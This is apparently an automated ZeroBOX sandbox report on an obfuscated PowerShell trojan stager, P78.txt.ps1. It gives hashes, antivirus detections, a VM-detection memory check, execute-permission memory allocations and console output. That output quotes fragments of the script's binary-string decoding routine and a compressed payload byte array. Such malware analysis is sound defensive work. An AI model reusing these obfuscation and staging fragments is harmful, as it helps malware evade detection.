Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	May 3, 2023, 5:51 p.m.	May 3, 2023, 5:53 p.m.

Size	1.1MB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`89e23a789958deaea91d782ad2264588`
SHA256	`70643fdf0ada7130ac0c7eeb0a9df30eb8ab15a9094dcafa9ee360d53e570be5`
CRC32	`D78C8106`
ssdeep	`24576:+DxjZI8OeJy9AWDZCmHl9LN85hw/Y1xDHf+URU6n6RSi9P4r4MuuGneCIhRtvIRQ:+DxjZI8OeJy9AWDZCmHl9LN85hw/Y1xV`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\P78.txt.ps1
3044

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Command line console output was observed (50 out of 14598 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000023	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x0000002f	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: verify that the path is correct and try again. console_handle: 0x0000003b	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\P78.txt.ps1:1 char:5685 console_handle: 0x00000047	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: + $QzLm=('011>110,01110101,01101110,011>011,011101>,01101>1,01101111,01101110,> console_handle: 0x00000053	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: >1>>0,>1>>0,>1>>0,>1>>0,01111101,>>1101,>>1010,01111101'.replace('>','00'))\|P < console_handle: 0x000003a7	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <<< \| %{ [System.Text.encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2 console_handle: 0x000003b3	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: )) };P([system.String]::Join('', $QzLm)) console_handle: 0x000003bf	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: + CategoryInfo : ObjectNotFound: (P:String) [], CommandNotFoundEx console_handle: 0x000003cb	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: ception console_handle: 0x000003d7	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000003e3	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x00000403	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x0000040f	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: verify that the path is correct and try again. console_handle: 0x0000041b	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\P78.txt.ps1:1 char:5766 console_handle: 0x00000427	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: + $QzLm=('011>110,01110101,01101110,011>011,011101>,01101>1,01101111,01101110,> console_handle: 0x00000433	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: >1>>0,>1>>0,>1>>0,>1>>0,01111101,>>1101,>>1010,01111101'.replace('>','00'))\|P \| console_handle: 0x00000787	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: %{ [System.Text.encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };P console_handle: 0x00000793	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <<<< ([system.String]::Join('', $QzLm)) console_handle: 0x0000079f	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: + CategoryInfo : ObjectNotFound: (P:String) [], CommandNotFoundEx console_handle: 0x000007ab	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: ception console_handle: 0x000007b7	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: + FullyQualifiedErrorId : CommandNotFoundException console_handle: 0x000007c3	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: The term 'P' is not recognized as the name of a cmdlet, function, script file, console_handle: 0x0000001b	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: or operable program. Check the spelling of the name, or if a path was included, console_handle: 0x00000027	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: verify that the path is correct and try again. console_handle: 0x00000033	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: At C:\Users\test22\AppData\Local\Temp\P78.txt.ps1:4 char:733391 console_handle: 0x0000003f	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: + [Byte[]]$y74gh00rffd=('<<1F,<<8B,<<08,<<00,<<00,<<00,<<00,<<00,<<04,<<00,<<EC console_handle: 0x0000004b	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: ,<<BB,<<79,<<3C,<<94,<<ED,<<F7,<<38,<<7E,<<CF,<<18,<<66,<<EC,<<A1,<<64,<<2D,<<8 console_handle: 0x00000057	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 5,<<42,<<C8,<<BE,<<94,<<16,<<7B,<<2A,<<B2,<<15,<<2A,<<31,<<18,<<8C,<<30,<<8C,<< console_handle: 0x00000063	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 51,<<64,<<09,<<21,<<4A,<<65,<<2B,<<CA,<<52,<<96,<<AC,<<95,<<2D,<<7B,<<49,<<22,< console_handle: 0x0000006f	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <D9,<<D7,<<EC,<<D9,<<B2,<<94,<<AC,<<69,<<53,<<96,<<DF,<<75,<<DF,<<A3,<<ED,<<79, console_handle: 0x0000007b	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <<3F,<<EF,<<EF,<<E7,<<FB,<<79,<<FD,<<FE,<<F9,<<FD,<<F1,<<9B,<<1E,<<E7,<<3E,<<E7 console_handle: 0x00000087	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: ,<<BA,<<CE,<<39,<<D7,<<D9,<<AE,<<73,<<5D,<<F7,<<3C,<<E8,<<9E,<<0C,<<87,<<68,<<2 console_handle: 0x00000093	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 0,<<08,<<C2,<<80,<<9F,<<B5,<<35,<<08,<<2A,<<81,<<A8,<<9F,<<83,<<D0,<<FF,<<FC,<< console_handle: 0x0000009f	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: F1,<<03,<<3F,<<2C,<<5B,<<CB,<<58,<<A0,<<C7,<<F4,<<4D,<<DB,<<4A,<<50,<<47,<<9B,< console_handle: 0x000000ab	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <B6,<<19,<<DB,<<13,<<DD,<<04,<<5C,<<C8,<<24,<<3B,<<32,<<DE,<<49,<<C0,<<1A,<<EF, console_handle: 0x000000b7	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <<EC,<<4C,<<A2,<<08,<<58,<<11,<<04,<<C8,<<EE,<<CE,<<02,<<44,<<67,<<01,<<8D,<<63 console_handle: 0x000000c3	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: ,<<46,<<02,<<4E,<<24,<<1B,<<82,<<24,<<33,<<33,<<83,<<D0,<<BA,<<0E,<<7D,<<4D,<<0 console_handle: 0x000000cf	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 8,<<3A,<<8A,<<A2,<<81,<<0C,<<DB,<<F4,<<6D,<<7E,<<EA,<<1D,<<86,<<D0,<<DB,<<18,<< console_handle: 0x000000db	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 51,<<38,<<08,<<32,<<44,<<43,<<D0,<<09,<<34,<<32,<<A6,<<45,<<02,<<4F,<<01,<<80,< console_handle: 0x000000e7	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <DC,<<43,<<53,<<AD,<<83,<<71,<<34,<<D5,<<6E,<<08,<<FA,<<FD,<<84,<<2A,<<D1,<<C8, console_handle: 0x000000f3	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <<38,<<FC,<<A1,<<81,<<0E,<<06,<<41,<<D0,<<06,<<E4,<<BF,<<DF,<<CF,<<5F,<<0F,<<E4 console_handle: 0x000000ff	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: ,<<33,<<ED,<<8C,<<86,<<4C,<<10,<<67,<<D0,<<90,<<06,<<CD,<<BF,<<38,<<09,<<D6,<<6 console_handle: 0x0000010b	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 3,<<02,<<0F,<<47,<<B0,<<3E,<<DF,<<FF,<<45,<<4C,<<7E,<<7D,<<80,<<7D,<<B8,<<3F,<< console_handle: 0x00000117	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 48,<<1C,<<A0,<<0F,<<FD,<<41,<<4B,<<52,<<08,<<1E,<<14,<<98,<<4D,<<7F,<<DD,<<2F,< console_handle: 0x00000123	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <C3,<<DF,<<76,<<FF,<<A1,<<C2,<<52,<<92,<<EC,<<46,<<B6,<<06,<<38,<<62,<<9B,<<DF, console_handle: 0x0000012f	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: <<BA,<<C3,<<C6,<<7F,<<33,<<1E,<<04,<<FF,<<49,<<92,<<09,<<8E,<<24,<<C0,<<C8,<<B4 console_handle: 0x0000013b	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: ,<<6E,<<33,<<A2,<<CB,<<F4,<<3F,<<F8,<<D4,<<FE,<<69,<<A6,<<08,<<89,<<CA,<<03,<<D console_handle: 0x00000147	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: B,<<86,<<86,<<68,<<A1,<<12,<<61,<<08,<<12,<<DF,<<0E,<<41,<<A8,<<F5,<<79,<<3F,<< console_handle: 0x00000153	1	1
WriteConsoleW May 3, 2023, 5:51 p.m.	buffer: 10,<<1C,<<C7,<<CD,<<E8,<<7F,<<8A,<<FD,<<D7,<<CF,<<09,<<11,<<05,<<08,<<A2,<<13,< console_handle: 0x0000015f	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey May 3, 2023, 5:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ffb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2023, 5:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ffb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2023, 5:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ffb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2023, 5:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ffb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2023, 5:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ffb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 3, 2023, 5:51 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04ffb028 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 3, 2023, 5:51 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (12 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026ab000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 1769472 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07600000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07773000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07774000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05830000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05832000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 3, 2023, 5:51 p.m.	process_identifier: 3044 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05833000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

File has been identified by 5 AntiVirus engines on VirusTotal as malicious (5 events)

Cyren	PSH/Agent.HA
Kaspersky	HEUR:Trojan.PowerShell.Kryptik.gen
ZoneAlarm	HEUR:Trojan.PowerShell.Kryptik.gen
Google	Detected
Fortinet	PowerShell/Stager.A!tr

P78.txt.ps1

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All